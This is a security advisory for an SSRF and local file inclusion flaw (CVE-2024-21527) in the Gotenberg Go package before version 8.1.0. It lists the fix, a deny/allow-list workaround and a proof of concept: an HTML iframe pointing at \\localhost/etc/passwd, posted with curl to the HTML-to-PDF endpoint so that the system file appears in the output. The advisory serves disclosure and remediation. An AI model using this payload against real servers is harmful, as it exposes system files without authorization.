Server-side Request Forgery (SSRF) Affecting github.com/gotenberg/gotenberg/v8/pkg/gotenberg package, versions <8.1.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.06% (27th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMGOTENBERGGOTENBERGV8PKGGOTENBERG-7537081
- published 18 Jul 2024
- disclosed 22 Feb 2024
- credit Filip Ochnik
Introduced: 22 Feb 2024
CVE-2024-21527 Open this link in a new tabHow to fix?
Upgrade github.com/gotenberg/gotenberg/v8/pkg/gotenberg to version 8.1.0 or higher.
Overview
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the /convert/html endpoint when a request is made to a file via localhost, such as <iframe src="\\localhost/etc/passwd">. By exploiting this vulnerability, an attacker can achieve local file inclusion, allowing of sensitive files read on the host system.
Workaround
An alternative is using either or both --chromium-deny-list and --chromium-allow-list flags.
PoC
- Start Gotenberg:
docker run --rm -p 3000:3000 gotenberg/gotenberg:8.0.3 gotenberg
- Create an index.html file with the following contents:
<body>
<iframe src="\\localhost/etc/passwd">
</body>
- Convert index.html to PDF:
curl -v \
--request POST 'http://localhost:3000/forms/chromium/convert/html' \
--form 'files=@"index.html"' -o output.pdf
- Open
output.pdf, it will include the contents of/etc/passwd.